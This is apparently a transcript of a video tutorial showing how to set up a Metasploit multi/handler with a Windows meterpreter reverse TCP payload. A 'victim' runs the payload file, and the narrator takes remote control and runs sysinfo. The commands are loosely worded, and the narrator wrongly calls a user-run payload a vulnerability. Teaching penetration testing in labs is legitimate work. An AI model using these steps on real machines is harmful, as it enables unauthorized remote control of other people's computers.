Hi, welcome back to my video. In this video, you are going to learn how to exploit Windows 7 using Metasploit. So the payload which we have used in the Windows XP, the same payload we are going to use in Windows 7 because what the vulnerability was present in the Windows XP, the same vulnerability was present in Windows 7. Now here, I have already opened the MSF console and now typing use exploit /multi /handler, then pressing enter, and next setting up the payload. Type set payload in capital letters, next Windows /meterpreter /TCP, and next setting lhost and the IP address. As I told, the lhost stands for your IP address, and next setting up the L port. At last type exploit, send the payload to the victim device, and when the victim tries to run the file and double click on it, here I am not having any victim. Now I am going to click on the victim PC. Now I am double clicking on the payload. So here I got the session open. Here you can see that the victim device is connected. Now I can control the victim device. Let me check the system information of the victim. For that I am typing sys info. Okay, now here you can see the victim PC information, that is Windows 7 and the victim PC name. So that's how we are going to exploit the Windows 7 by using Metasploit. That's all in this video. Thank you.